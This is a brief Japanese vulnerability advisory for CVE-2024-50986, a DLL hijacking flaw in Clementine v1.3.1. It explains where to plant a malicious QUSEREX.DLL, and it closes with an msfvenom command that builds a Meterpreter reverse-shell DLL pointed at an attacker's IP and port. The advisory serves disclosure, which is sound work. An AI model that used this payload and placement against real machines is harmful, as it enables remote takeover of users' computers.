
Clementine v.1.3.1 の脆弱性により、ローカルの攻撃者が細工された DLL ファイル(DLL ハイジャッキング)を介して任意のコードを実行できる可能性があります。
説明: Clementine v.1.3.1 の問題により、ローカルの攻撃者が細工された DLL ファイルを介して任意のコードを実行できる可能性があります。
影響を受けるバージョン: Clementine v.1.3.1
研究者: Utkarsh (r1971d3) LinkedIn
NIST CVE リンク: https://nvd.nist.gov/vuln/detail/CVE-2024-50986
脆弱性タイプ: 信頼できない検索パス
影響を受けるコンポーネント: QUSEREX.DLL
この脆弱性を悪用するには、攻撃者は QUSEREX.DLL という名前の悪意のある DLL を作成し、ディレクトリ C:\Users<username>\AppData\Local\Microsoft\WindowsApps\ に配置する必要があります。Clementine アプリケーションが起動されると、悪意のある DLL が読み込まれ、攻撃者のコードが実行されます。


sudo msfvenom -p windows/meterpreter/reverse_tcp -ax86 -f dll LHOST=<IP Address> LPORT=<Port> > QUSEREX.DLL



